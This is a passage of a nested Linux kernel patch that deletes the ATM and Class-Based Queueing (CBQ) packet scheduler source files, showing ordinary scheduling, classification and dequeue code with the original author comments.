+-/*
+- * Dequeue packets and send them over ATM. Note that we quite deliberately
+- * avoid checking net_device's flow control here, simply because sch_atm
+- * uses its own channels, which have nothing to do with any CLIP/LANE/or
+- * non-ATM interfaces.
+- */
+-
+-static void sch_atm_dequeue(struct tasklet_struct *t)
+-{
+-	struct atm_qdisc_data *p = from_tasklet(p, t, task);
+-	struct Qdisc *sch = qdisc_from_priv(p);
+-	struct atm_flow_data *flow;
+-	struct sk_buff *skb;
+-
+-	pr_debug("sch_atm_dequeue(sch %p,[qdisc %p])\n", sch, p);
+-	list_for_each_entry(flow, &p->flows, list) {
+-		if (flow == &p->link)
+-			continue;
+-		/*
+-		 * If traffic is properly shaped, this won't generate nasty
+-		 * little bursts. Otherwise, it may ... (but that's okay)
+-		 */
+-		while ((skb = flow->q->ops->peek(flow->q))) {
+-			if (!atm_may_send(flow->vcc, skb->truesize))
+-				break;
+-
+-			skb = qdisc_dequeue_peeked(flow->q);
+-			if (unlikely(!skb))
+-				break;
+-
+-			qdisc_bstats_update(sch, skb);
+-			bstats_update(&flow->bstats, skb);
+-			pr_debug("atm_tc_dequeue: sending on class %p\n", flow);
+-			/* remove any LL header somebody else has attached */
+-			skb_pull(skb, skb_network_offset(skb));
+-			if (skb_headroom(skb) < flow->hdr_len) {
+-				struct sk_buff *new;
+-
+-				new = skb_realloc_headroom(skb, flow->hdr_len);
+-				dev_kfree_skb(skb);
+-				if (!new)
+-					continue;
+-				skb = new;
+-			}
+-			pr_debug("sch_atm_dequeue: ip %p, data %p\n",
+-				 skb_network_header(skb), skb->data);
+-			ATM_SKB(skb)->vcc = flow->vcc;
+-			memcpy(skb_push(skb, flow->hdr_len), flow->hdr,
+-			       flow->hdr_len);
+-			refcount_add(skb->truesize,
+-				   &sk_atm(flow->vcc)->sk_wmem_alloc);
+-			/* atm.atm_options are already set by atm_tc_enqueue */
+-			flow->vcc->send(flow->vcc, skb);
+-		}
+-	}
+-}
+-
+-static struct sk_buff *atm_tc_dequeue(struct Qdisc *sch)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct sk_buff *skb;
+-
+-	pr_debug("atm_tc_dequeue(sch %p,[qdisc %p])\n", sch, p);
+-	tasklet_schedule(&p->task);
+-	skb = qdisc_dequeue_peeked(p->link.q);
+-	if (skb)
+-		sch->q.qlen--;
+-	return skb;
+-}
+-
+-static struct sk_buff *atm_tc_peek(struct Qdisc *sch)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-
+-	pr_debug("atm_tc_peek(sch %p,[qdisc %p])\n", sch, p);
+-
+-	return p->link.q->ops->peek(p->link.q);
+-}
+-
+-static int atm_tc_init(struct Qdisc *sch, struct nlattr *opt,
+-		       struct netlink_ext_ack *extack)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	int err;
+-
+-	pr_debug("atm_tc_init(sch %p,[qdisc %p],opt %p)\n", sch, p, opt);
+-	INIT_LIST_HEAD(&p->flows);
+-	INIT_LIST_HEAD(&p->link.list);
+-	gnet_stats_basic_sync_init(&p->link.bstats);
+-	list_add(&p->link.list, &p->flows);
+-	p->link.q = qdisc_create_dflt(sch->dev_queue,
+-				      &pfifo_qdisc_ops, sch->handle, extack);
+-	if (!p->link.q)
+-		p->link.q = &noop_qdisc;
+-	pr_debug("atm_tc_init: link (%p) qdisc %p\n", &p->link, p->link.q);
+-	p->link.vcc = NULL;
+-	p->link.sock = NULL;
+-	p->link.common.classid = sch->handle;
+-	p->link.ref = 1;
+-
+-	err = tcf_block_get(&p->link.block, &p->link.filter_list, sch,
+-			    extack);
+-	if (err)
+-		return err;
+-
+-	tasklet_setup(&p->task, sch_atm_dequeue);
+-	return 0;
+-}
+-
+-static void atm_tc_reset(struct Qdisc *sch)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow;
+-
+-	pr_debug("atm_tc_reset(sch %p,[qdisc %p])\n", sch, p);
+-	list_for_each_entry(flow, &p->flows, list)
+-		qdisc_reset(flow->q);
+-}
+-
+-static void atm_tc_destroy(struct Qdisc *sch)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow, *tmp;
+-
+-	pr_debug("atm_tc_destroy(sch %p,[qdisc %p])\n", sch, p);
+-	list_for_each_entry(flow, &p->flows, list) {
+-		tcf_block_put(flow->block);
+-		flow->block = NULL;
+-	}
+-
+-	list_for_each_entry_safe(flow, tmp, &p->flows, list) {
+-		if (flow->ref > 1)
+-			pr_err("atm_destroy: %p->ref = %d\n", flow, flow->ref);
+-		atm_tc_put(sch, (unsigned long)flow);
+-	}
+-	tasklet_kill(&p->task);
+-}
+-
+-static int atm_tc_dump_class(struct Qdisc *sch, unsigned long cl,
+-			     struct sk_buff *skb, struct tcmsg *tcm)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow = (struct atm_flow_data *)cl;
+-	struct nlattr *nest;
+-
+-	pr_debug("atm_tc_dump_class(sch %p,[qdisc %p],flow %p,skb %p,tcm %p)\n",
+-		sch, p, flow, skb, tcm);
+-	if (list_empty(&flow->list))
+-		return -EINVAL;
+-	tcm->tcm_handle = flow->common.classid;
+-	tcm->tcm_info = flow->q->handle;
+-
+-	nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
+-	if (nest == NULL)
+-		goto nla_put_failure;
+-
+-	if (nla_put(skb, TCA_ATM_HDR, flow->hdr_len, flow->hdr))
+-		goto nla_put_failure;
+-	if (flow->vcc) {
+-		struct sockaddr_atmpvc pvc;
+-		int state;
+-
+-		memset(&pvc, 0, sizeof(pvc));
+-		pvc.sap_family = AF_ATMPVC;
+-		pvc.sap_addr.itf = flow->vcc->dev ? flow->vcc->dev->number : -1;
+-		pvc.sap_addr.vpi = flow->vcc->vpi;
+-		pvc.sap_addr.vci = flow->vcc->vci;
+-		if (nla_put(skb, TCA_ATM_ADDR, sizeof(pvc), &pvc))
+-			goto nla_put_failure;
+-		state = ATM_VF2VS(flow->vcc->flags);
+-		if (nla_put_u32(skb, TCA_ATM_STATE, state))
+-			goto nla_put_failure;
+-	}
+-	if (flow->excess) {
+-		if (nla_put_u32(skb, TCA_ATM_EXCESS, flow->common.classid))
+-			goto nla_put_failure;
+-	} else {
+-		if (nla_put_u32(skb, TCA_ATM_EXCESS, 0))
+-			goto nla_put_failure;
+-	}
+-	return nla_nest_end(skb, nest);
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, nest);
+-	return -1;
+-}
+-static int
+-atm_tc_dump_class_stats(struct Qdisc *sch, unsigned long arg,
+-			struct gnet_dump *d)
+-{
+-	struct atm_flow_data *flow = (struct atm_flow_data *)arg;
+-
+-	if (gnet_stats_copy_basic(d, NULL, &flow->bstats, true) < 0 ||
+-	    gnet_stats_copy_queue(d, NULL, &flow->qstats, flow->q->q.qlen) < 0)
+-		return -1;
+-
+-	return 0;
+-}
+-
+-static int atm_tc_dump(struct Qdisc *sch, struct sk_buff *skb)
+-{
+-	return 0;
+-}
+-
+-static const struct Qdisc_class_ops atm_class_ops = {
+-	.graft		= atm_tc_graft,
+-	.leaf		= atm_tc_leaf,
+-	.find		= atm_tc_find,
+-	.change		= atm_tc_change,
+-	.delete		= atm_tc_delete,
+-	.walk		= atm_tc_walk,
+-	.tcf_block	= atm_tc_tcf_block,
+-	.bind_tcf	= atm_tc_bind_filter,
+-	.unbind_tcf	= atm_tc_put,
+-	.dump		= atm_tc_dump_class,
+-	.dump_stats	= atm_tc_dump_class_stats,
+-};
+-
+-static struct Qdisc_ops atm_qdisc_ops __read_mostly = {
+-	.cl_ops		= &atm_class_ops,
+-	.id		= "atm",
+-	.priv_size	= sizeof(struct atm_qdisc_data),
+-	.enqueue	= atm_tc_enqueue,
+-	.dequeue	= atm_tc_dequeue,
+-	.peek		= atm_tc_peek,
+-	.init		= atm_tc_init,
+-	.reset		= atm_tc_reset,
+-	.destroy	= atm_tc_destroy,
+-	.dump		= atm_tc_dump,
+-	.owner		= THIS_MODULE,
+-};
+-
+-static int __init atm_init(void)
+-{
+-	return register_qdisc(&atm_qdisc_ops);
+-}
+-
+-static void __exit atm_exit(void)
+-{
+-	unregister_qdisc(&atm_qdisc_ops);
+-}
+-
+-module_init(atm_init)
+-module_exit(atm_exit)
+-MODULE_LICENSE("GPL");
+diff --git a/net/sched/sch_cbq.c b/net/sched/sch_cbq.c
+deleted file mode 100644
+index 36db5f6782f2c..0000000000000
+--- a/net/sched/sch_cbq.c
++++ /dev/null
+@@ -1,1727 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- * net/sched/sch_cbq.c	Class-Based Queueing discipline.
+- *
+- * Authors:	Alexey Kuznetsov, <kuznet@ms2.inr.ac.ru>
+- */
+-
+-#include <linux/module.h>
+-#include <linux/slab.h>
+-#include <linux/types.h>
+-#include <linux/kernel.h>
+-#include <linux/string.h>
+-#include <linux/errno.h>
+-#include <linux/skbuff.h>
+-#include <net/netlink.h>
+-#include <net/pkt_sched.h>
+-#include <net/pkt_cls.h>
+-
+-
+-/*	Class-Based Queueing (CBQ) algorithm.
+-	=======================================
+-
+-	Sources: [1] Sally Floyd and Van Jacobson, "Link-sharing and Resource
+-		 Management Models for Packet Networks",
+-		 IEEE/ACM Transactions on Networking, Vol.3, No.4, 1995
+-
+-		 [2] Sally Floyd, "Notes on CBQ and Guaranteed Service", 1995
+-
+-		 [3] Sally Floyd, "Notes on Class-Based Queueing: Setting
+-		 Parameters", 1996
+-
+-		 [4] Sally Floyd and Michael Speer, "Experimental Results
+-		 for Class-Based Queueing", 1998, not published.
+-
+-	-----------------------------------------------------------------------
+-
+-	Algorithm skeleton was taken from NS simulator cbq.cc.
+-	If someone wants to check this code against the LBL version,
+-	he should take into account that ONLY the skeleton was borrowed,
+-	the implementation is different. Particularly:
+-
+-	--- The WRR algorithm is different. Our version looks more
+-	reasonable (I hope) and works when quanta are allowed to be
+-	less than MTU, which is always the case when real time classes
+-	have small rates. Note, that the statement of [3] is
+-	incomplete, delay may actually be estimated even if class
+-	per-round allotment is less than MTU. Namely, if per-round
+-	allotment is W*r_i, and r_1+...+r_k = r < 1
+-
+-	delay_i <= ([MTU/(W*r_i)]*W*r + W*r + k*MTU)/B
+-
+-	In the worst case we have IntServ estimate with D = W*r+k*MTU
+-	and C = MTU*r. The proof (if correct at all) is trivial.
+-
+-
+-	--- It seems that cbq-2.0 is not very accurate. At least, I cannot
+-	interpret some places, which look like wrong translations
+-	from NS. Anyone is advised to find these differences
+-	and explain to me, why I am wrong 8).
+-
+-	--- Linux has no EOI event, so that we cannot estimate true class
+-	idle time. Workaround is to consider the next dequeue event
+-	as sign that previous packet is finished. This is wrong because of
+-	internal device queueing, but on a permanently loaded link it is true.
+-	Moreover, combined with clock integrator, this scheme looks
+-	very close to an ideal solution.  */
+-
+-struct cbq_sched_data;
+-
+-
+-struct cbq_class {
+-	struct Qdisc_class_common common;
+-	struct cbq_class	*next_alive;	/* next class with backlog in this priority band */
+-
+-/* Parameters */
+-	unsigned char		priority;	/* class priority */
+-	unsigned char		priority2;	/* priority to be used after overlimit */
+-	unsigned char		ewma_log;	/* time constant for idle time calculation */
+-
+-	u32			defmap;
+-
+-	/* Link-sharing scheduler parameters */
+-	long			maxidle;	/* Class parameters: see below. */
+-	long			offtime;
+-	long			minidle;
+-	u32			avpkt;
+-	struct qdisc_rate_table	*R_tab;
+-
+-	/* General scheduler (WRR) parameters */
+-	long			allot;
+-	long			quantum;	/* Allotment per WRR round */
+-	long			weight;		/* Relative allotment: see below */
+-
+-	struct Qdisc		*qdisc;		/* Ptr to CBQ discipline */
+-	struct cbq_class	*split;		/* Ptr to split node */
+-	struct cbq_class	*share;		/* Ptr to LS parent in the class tree */
+-	struct cbq_class	*tparent;	/* Ptr to tree parent in the class tree */
+-	struct cbq_class	*borrow;	/* NULL if class is bandwidth limited;
+-						   parent otherwise */
+-	struct cbq_class	*sibling;	/* Sibling chain */
+-	struct cbq_class	*children;	/* Pointer to children chain */
+-
+-	struct Qdisc		*q;		/* Elementary queueing discipline */
+-
+-
+-/* Variables */
+-	unsigned char		cpriority;	/* Effective priority */
+-	unsigned char		delayed;
+-	unsigned char		level;		/* level of the class in hierarchy:
+-						   0 for leaf classes, and maximal
+-						   level of children + 1 for nodes.
+-						 */
+-
+-	psched_time_t		last;		/* Last end of service */
+-	psched_time_t		undertime;
+-	long			avgidle;
+-	long			deficit;	/* Saved deficit for WRR */
+-	psched_time_t		penalized;
+-	struct gnet_stats_basic_sync bstats;
+-	struct gnet_stats_queue qstats;
+-	struct net_rate_estimator __rcu *rate_est;
+-	struct tc_cbq_xstats	xstats;
+-
+-	struct tcf_proto __rcu	*filter_list;
+-	struct tcf_block	*block;
+-
+-	int			filters;
+-
+-	struct cbq_class	*defaults[TC_PRIO_MAX + 1];
+-};
+-
+-struct cbq_sched_data {
+-	struct Qdisc_class_hash	clhash;			/* Hash table of all classes */
+-	int			nclasses[TC_CBQ_MAXPRIO + 1];
+-	unsigned int		quanta[TC_CBQ_MAXPRIO + 1];
+-
+-	struct cbq_class	link;
+-
+-	unsigned int		activemask;
+-	struct cbq_class	*active[TC_CBQ_MAXPRIO + 1];	/* List of all classes
+-								   with backlog */
+-
+-#ifdef CONFIG_NET_CLS_ACT
+-	struct cbq_class	*rx_class;
+-#endif
+-	struct cbq_class	*tx_class;
+-	struct cbq_class	*tx_borrowed;
+-	int			tx_len;
+-	psched_time_t		now;		/* Cached timestamp */
+-	unsigned int		pmask;
+-
+-	struct qdisc_watchdog	watchdog;	/* Watchdog timer,
+-						   started when CBQ has
+-						   backlog, but cannot
+-						   transmit just now */
+-	psched_tdiff_t		wd_expires;
+-	int			toplevel;
+-	u32			hgenerator;
+-};
+-
+-
+-#define L2T(cl, len)	qdisc_l2t((cl)->R_tab, len)
+-
+-static inline struct cbq_class *
+-cbq_class_lookup(struct cbq_sched_data *q, u32 classid)
+-{
+-	struct Qdisc_class_common *clc;
+-
+-	clc = qdisc_class_find(&q->clhash, classid);
+-	if (clc == NULL)
+-		return NULL;
+-	return container_of(clc, struct cbq_class, common);
+-}
+-
+-#ifdef CONFIG_NET_CLS_ACT
+-
+-static struct cbq_class *
+-cbq_reclassify(struct sk_buff *skb, struct cbq_class *this)
+-{
+-	struct cbq_class *cl;
+-
+-	for (cl = this->tparent; cl; cl = cl->tparent) {
+-		struct cbq_class *new = cl->defaults[TC_PRIO_BESTEFFORT];
+-
+-		if (new != NULL && new != this)
+-			return new;
+-	}
+-	return NULL;
+-}
+-
+-#endif
+-
+-/* Classify packet. The procedure is pretty complicated, but
+- * it allows us to combine link sharing and priority scheduling
+- * transparently.
+- *
+- * Namely, you can put link sharing rules (f.e. route based) at root of CBQ,
+- * so that it resolves to split nodes. Then packets are classified
+- * by logical priority, or a more specific classifier may be attached
+- * to the split node.
+- */
+-
+-static struct cbq_class *
+-cbq_classify(struct sk_buff *skb, struct Qdisc *sch, int *qerr)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct cbq_class *head = &q->link;
+-	struct cbq_class **defmap;
+-	struct cbq_class *cl = NULL;
+-	u32 prio = skb->priority;
+-	struct tcf_proto *fl;
+-	struct tcf_result res;
+-
+-	/*
+-	 *  Step 1. If skb->priority points to one of our classes, use it.
+-	 */
+-	if (TC_H_MAJ(prio ^ sch->handle) == 0 &&
+-	    (cl = cbq_class_lookup(q, prio)) != NULL)
+-		return cl;
+-
+-	*qerr = NET_XMIT_SUCCESS | __NET_XMIT_BYPASS;
+-	for (;;) {
+-		int result = 0;
+-		defmap = head->defaults;
+-
+-		fl = rcu_dereference_bh(head->filter_list);
+-		/*
+-		 * Step 2+n. Apply classifier.
+-		 */
+-		result = tcf_classify(skb, NULL, fl, &res, true);
+-		if (!fl || result < 0)
+-			goto fallback;
+-		if (result == TC_ACT_SHOT)
+-			return NULL;
+-
+-		cl = (void *)res.class;
+-		if (!cl) {
+-			if (TC_H_MAJ(res.classid))
+-				cl = cbq_class_lookup(q, res.classid);
+-			else if ((cl = defmap[res.classid & TC_PRIO_MAX]) == NULL)
+-				cl = defmap[TC_PRIO_BESTEFFORT];
+-
+-			if (cl == NULL)
+-				goto fallback;
+-		}
+-		if (cl->level >= head->level)
+-			goto fallback;
+-#ifdef CONFIG_NET_CLS_ACT
+-		switch (result) {
+-		case TC_ACT_QUEUED:
+-		case TC_ACT_STOLEN:
+-		case TC_ACT_TRAP:
+-			*qerr = NET_XMIT_SUCCESS | __NET_XMIT_STOLEN;
+-			fallthrough;
+-		case TC_ACT_RECLASSIFY:
+-			return cbq_reclassify(skb, cl);
+-		}
+-#endif
+-		if (cl->level == 0)
+-			return cl;
+-
+-		/*
+-		 * Step 3+n. If classifier selected a link sharing class,
+-		 *	   apply agency specific classifier.
+-		 *	   Repeat this procedure until we hit a leaf node.
+-		 */
+-		head = cl;
+-	}
+-
+-fallback:
+-	cl = head;
+-
+-	/*
+-	 * Step 4. No success...
+-	 */
+-	if (TC_H_MAJ(prio) == 0 &&
+-	    !(cl = head->defaults[prio & TC_PRIO_MAX]) &&
+-	    !(cl = head->defaults[TC_PRIO_BESTEFFORT]))
+-		return head;
+-
+-	return cl;
+-}
+-
+-/*
+- * A packet has just been enqueued on the empty class.
+- * cbq_activate_class adds it to the tail of active class list
+- * of its priority band.
+- */
+-
+-static inline void cbq_activate_class(struct cbq_class *cl)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(cl->qdisc);
+-	int prio = cl->cpriority;
+-	struct cbq_class *cl_tail;
+-
+-	cl_tail = q->active[prio];
+-	q->active[prio] = cl;
+-
+-	if (cl_tail != NULL) {
+-		cl->next_alive = cl_tail->next_alive;
+-		cl_tail->next_alive = cl;
+-	} else {
+-		cl->next_alive = cl;
+-		q->activemask |= (1<<prio);
+-	}
+-}
+-
+-/*
+- * Unlink class from active chain.
+- * Note that this same procedure is done directly in cbq_dequeue*
+- * during round-robin procedure.
+- */
+-
+-static void cbq_deactivate_class(struct cbq_class *this)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(this->qdisc);
+-	int prio = this->cpriority;
+-	struct cbq_class *cl;
+-	struct cbq_class *cl_prev = q->active[prio];
+-
+-	do {
+-		cl = cl_prev->next_alive;
+-		if (cl == this) {
+-			cl_prev->next_alive = cl->next_alive;
+-			cl->next_alive = NULL;
+-
+-			if (cl == q->active[prio]) {
+-				q->active[prio] = cl_prev;
+-				if (cl == q->active[prio]) {
+-					q->active[prio] = NULL;
+-					q->activemask &= ~(1<<prio);
+-					return;
+-				}
+-			}
+-			return;
+-		}
+-	} while ((cl_prev = cl) != q->active[prio]);
+-}
+-
+-static void
+-cbq_mark_toplevel(struct cbq_sched_data *q, struct cbq_class *cl)
+-{
+-	int toplevel = q->toplevel;
+-
+-	if (toplevel > cl->level) {
+-		psched_time_t now = psched_get_time();
+-
+-		do {
+-			if (cl->undertime < now) {
+-				q->toplevel = cl->level;
+-				return;
+-			}
+-		} while ((cl = cl->borrow) != NULL && toplevel > cl->level);
+-	}
+-}
+-
+-static int
+-cbq_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+-	    struct sk_buff **to_free)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	int ret;
+-	struct cbq_class *cl = cbq_classify(skb, sch, &ret);
+-
+-#ifdef CONFIG_NET_CLS_ACT
+-	q->rx_class = cl;
+-#endif
+-	if (cl == NULL) {
+-		if (ret & __NET_XMIT_BYPASS)
+-			qdisc_qstats_drop(sch);
+-		__qdisc_drop(skb, to_free);
+-		return ret;
+-	}
+-
+-	ret = qdisc_enqueue(skb, cl->q, to_free);
+-	if (ret == NET_XMIT_SUCCESS) {
+-		sch->q.qlen++;
+-		cbq_mark_toplevel(q, cl);
+-		if (!cl->next_alive)
+-			cbq_activate_class(cl);
+-		return ret;
+-	}
+-
+-	if (net_xmit_drop_count(ret)) {
+-		qdisc_qstats_drop(sch);
+-		cbq_mark_toplevel(q, cl);
+-		cl->qstats.drops++;
+-	}
+-	return ret;
+-}
+-
+-/* Overlimit action: penalize leaf class by adding offtime */
+-static void cbq_overlimit(struct cbq_class *cl)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(cl->qdisc);
+-	psched_tdiff_t delay = cl->undertime - q->now;
+-
+-	if (!cl->delayed) {
+-		delay += cl->offtime;
+-
+-		/*
+-		 * Class goes to sleep, so that it will have no
+-		 * chance to work avgidle. Let's forgive it 8)
+-		 *
+-		 * BTW cbq-2.0 has a crap in this
+-		 * place, apparently they forgot to shift it by cl->ewma_log.
+-		 */
+-		if (cl->avgidle < 0)
+-			delay -= (-cl->avgidle) - ((-cl->avgidle) >> cl->ewma_log);
+-		if (cl->avgidle < cl->minidle)
+-			cl->avgidle = cl->minidle;
+-		if (delay <= 0)
+-			delay = 1;
+-		cl->undertime = q->now + delay;
+-
+-		cl->xstats.overactions++;
+-		cl->delayed = 1;
+-	}
+-	if (q->wd_expires == 0 || q->wd_expires > delay)
+-		q->wd_expires = delay;
+-
+-	/* Dirty work! We must schedule wakeups based on
+-	 * real available rate, rather than leaf rate,
+-	 * which may be tiny (even zero).
+-	 */
+-	if (q->toplevel == TC_CBQ_MAXLEVEL) {
+-		struct cbq_class *b;
+-		psched_tdiff_t base_delay = q->wd_expires;
+-
+-		for (b = cl->borrow; b; b = b->borrow) {
+-			delay = b->undertime - q->now;
+-			if (delay < base_delay) {
+-				if (delay <= 0)
+-					delay = 1;
+-				base_delay = delay;
+-			}
+-		}
+-
+-		q->wd_expires = base_delay;
+-	}
+-}
+-
+-/*
+- * It is mission critical procedure.
+- *
+- * We "regenerate" toplevel cutoff, if transmitting class
+- * has backlog and it is not regulated. It is not part of
+- * original CBQ description, but looks more reasonable.
+- * Probably, it is wrong. This question needs further investigation.
+- */
+-
+-static inline void
+-cbq_update_toplevel(struct cbq_sched_data *q, struct cbq_class *cl,
+-		    struct cbq_class *borrowed)
+-{
+-	if (cl && q->toplevel >= borrowed->level) {
+-		if (cl->q->q.qlen > 1) {
+-			do {
+-				if (borrowed->undertime == PSCHED_PASTPERFECT) {
+-					q->toplevel = borrowed->level;
+-					return;
+-				}
+-			} while ((borrowed = borrowed->borrow) != NULL);
+-		}
+-#if 0
+-	/* It is not necessary now. Uncommenting it
+-	   will save CPU cycles, but decrease fairness.
+-	 */
+-		q->toplevel = TC_CBQ_MAXLEVEL;
+-#endif
+-	}
+-}
+-
+-static void
+-cbq_update(struct cbq_sched_data *q)
+-{
+-	struct cbq_class *this = q->tx_class;
+-	struct cbq_class *cl = this;
+-	int len = q->tx_len;
+-	psched_time_t now;
+-
+-	q->tx_class = NULL;
+-	/* Time integrator. We calculate EOS time
+-	 * by adding expected packet transmission time.
+-	 */
+-	now = q->now + L2T(&q->link, len);
+-
+-	for ( ; cl; cl = cl->share) {
+-		long avgidle = cl->avgidle;
+-		long idle;
+-
+-		_bstats_update(&cl->bstats, len, 1);
+-
+-		/*
+-		 * (now - last) is total time between packet right edges.
+-		 * (last_pktlen/rate) is "virtual" busy time, so that
+-		 *
+-		 *	idle = (now - last) - last_pktlen/rate
+-		 */
+-
+-		idle = now - cl->last;
+-		if ((unsigned long)idle > 128*1024*1024) {
+-			avgidle = cl->maxidle;
+-		} else {
+-			idle -= L2T(cl, len);
+-
+-		/* true_avgidle := (1-W)*true_avgidle + W*idle,
+-		 * where W=2^{-ewma_log}. But cl->avgidle is scaled:
+-		 * cl->avgidle == true_avgidle/W,
+-		 * hence:
+-		 */
+-			avgidle += idle - (avgidle>>cl->ewma_log);
+-		}
+-
+-		if (avgidle <= 0) {
+-			/* Overlimit or at-limit */
+-
+-			if (avgidle < cl->minidle)
+-				avgidle = cl->minidle;
+-
+-			cl->avgidle = avgidle;
+-
+-			/* Calculate expected time, when this class
+-			 * will be allowed to send.
+-			 * It will occur, when:
+-			 * (1-W)*true_avgidle + W*delay = 0, i.e.
+-			 * idle = (1/W - 1)*(-true_avgidle)
+-			 * or
+-			 * idle = (1 - W)*(-cl->avgidle);
+-			 */
+-			idle = (-avgidle) - ((-avgidle) >> cl->ewma_log);
+-
+-			/*
+-			 * That is not all.
+-			 * To maintain the rate allocated to the class,
+-			 * we add to undertime virtual clock,
+-			 * necessary to complete transmitted packet.
+-			 * (len/phys_bandwidth has been already passed
+-			 * to the moment of cbq_update)
+-			 */
+-
+-			idle -= L2T(&q->link, len);
+-			idle += L2T(cl, len);
+-
+-			cl->undertime = now + idle;
+-		} else {
+-			/* Underlimit */
+-
+-			cl->undertime = PSCHED_PASTPERFECT;
+-			if (avgidle > cl->maxidle)
+-				cl->avgidle = cl->maxidle;
+-			else
+-				cl->avgidle = avgidle;
+-		}
+-		if ((s64)(now - cl->last) > 0)
+-			cl->last = now;
+-	}
+-
+-	cbq_update_toplevel(q, this, q->tx_borrowed);
+-}
+-
+-static inline struct cbq_class *
+-cbq_under_limit(struct cbq_class *cl)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(cl->qdisc);
+-	struct cbq_class *this_cl = cl;
+-
+-	if (cl->tparent == NULL)
+-		return cl;
+-
+-	if (cl->undertime == PSCHED_PASTPERFECT || q->now >= cl->undertime) {
+-		cl->delayed = 0;
+-		return cl;
+-	}
+-
+-	do {
+-		/* It is very suspicious place. Now overlimit
+-		 * action is generated for not bounded classes
+-		 * only if link is completely congested.
+-		 * Though it is in agree with ancestor-only paradigm,
+-		 * it looks very stupid. Particularly,
+-		 * it means that this chunk of code will either
+-		 * never be called or result in strong amplification
+-		 * of burstiness. Dangerous, silly, and, however,
+-		 * no another solution exists.
+-		 */
+-		cl = cl->borrow;
+-		if (!cl) {
+-			this_cl->qstats.overlimits++;
+-			cbq_overlimit(this_cl);
+-			return NULL;
+-		}
+-		if (cl->level > q->toplevel)
+-			return NULL;
+-	} while (cl->undertime != PSCHED_PASTPERFECT && q->now < cl->undertime);
+-
+-	cl->delayed = 0;
+-	return cl;
+-}
+-
+-static inline struct sk_buff *
+-cbq_dequeue_prio(struct Qdisc *sch, int prio)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct cbq_class *cl_tail, *cl_prev, *cl;
+-	struct sk_buff *skb;
+-	int deficit;
+-
+-	cl_tail = cl_prev = q->active[prio];
+-	cl = cl_prev->next_alive;
+-
+-	do {
+-		deficit = 0;
+-
+-		/* Start round */
+-		do {
+-			struct cbq_class *borrow = cl;
+-
+-			if (cl->q->q.qlen &&
+-			    (borrow = cbq_under_limit(cl)) == NULL)
+-				goto skip_class;
+-
+-			if (cl->deficit <= 0) {
+-				/* Class exhausted its allotment per
+-				 * this round. Switch to the next one.
+-				 */
+-				deficit = 1;
+-				cl->deficit += cl->quantum;
+-				goto next_class;
+-			}
+-
+-			skb = cl->q->dequeue(cl->q);
+-
+-			/* Class did not give us any skb :-(
+-			 * This can occur even if cl->q->q.qlen != 0,
+-			 * e.g. if cl->q == "tbf"
+-			 */
+-			if (skb == NULL)
+-				goto skip_class;
+-
+-			cl->deficit -= qdisc_pkt_len(skb);
+-			q->tx_class = cl;
+-			q->tx_borrowed = borrow;
+-			if (borrow != cl) {
+-#ifndef CBQ_XSTATS_BORROWS_BYTES
+-				borrow->xstats.borrows++;
+-				cl->xstats.borrows++;
+-#else
+-				borrow->xstats.borrows += qdisc_pkt_len(skb);
+-				cl->xstats.borrows += qdisc_pkt_len(skb);
+-#endif
+-			}
+-			q->tx_len = qdisc_pkt_len(skb);
+-
+-			if (cl->deficit <= 0) {
+-				q->active[prio] = cl;
+-				cl = cl->next_alive;
+-				cl->deficit += cl->quantum;
+-			}
+-			return skb;
+-
+-skip_class:
+-			if (cl->q->q.qlen == 0 || prio != cl->cpriority) {
+-				/* Class is empty or penalized.
+-				 * Unlink it from active chain.
+-				 */
+-				cl_prev->next_alive = cl->next_alive;
+-				cl->next_alive = NULL;
+-
+-				/* Did cl_tail point to it? */
+-				if (cl == cl_tail) {
+-					/* Repair it! */
+-					cl_tail = cl_prev;
+-
+-					/* Was it the last class in this band? */
+-					if (cl == cl_tail) {
+-						/* Kill the band! */
+-						q->active[prio] = NULL;
+-						q->activemask &= ~(1<<prio);
+-						if (cl->q->q.qlen)
+-							cbq_activate_class(cl);
+-						return NULL;
+-					}
+-
+-					q->active[prio] = cl_tail;
+-				}
+-				if (cl->q->q.qlen)
+-					cbq_activate_class(cl);
+-
+-				cl = cl_prev;
+-			}
+-
+-next_class:
+-			cl_prev = cl;
+-			cl = cl->next_alive;
+-		} while (cl_prev != cl_tail);
+-	} while (deficit);
+-
+-	q->active[prio] = cl_prev;
+-
+-	return NULL;
+-}
+-
+-static inline struct sk_buff *
+-cbq_dequeue_1(struct Qdisc *sch)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct sk_buff *skb;
+-	unsigned int activemask;
+-
+-	activemask = q->activemask & 0xFF;
+-	while (activemask) {
+-		int prio = ffz(~activemask);
+-		activemask &= ~(1<<prio);
+-		skb = cbq_dequeue_prio(sch, prio);
+-		if (skb)
+-			return skb;
+-	}
+-	return NULL;
+-}
+-
+-static struct sk_buff *
+-cbq_dequeue(struct Qdisc *sch)
+-{
+-	struct sk_buff *skb;
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	psched_time_t now;
+-
+-	now = psched_get_time();
+-
+-	if (q->tx_class)
+-		cbq_update(q);
+-
+-	q->now = now;
+-
+-	for (;;) {
+-		q->wd_expires = 0;
+-
+-		skb = cbq_dequeue_1(sch);
+-		if (skb) {
+-			qdisc_bstats_update(sch, skb);
+-			sch->q.qlen--;
+-			return skb;
+-		}
+-
+-		/* All the classes are overlimit.
+-		 *
+-		 * This is possible if:
+-		 *
+-		 * 1. The scheduler is empty.
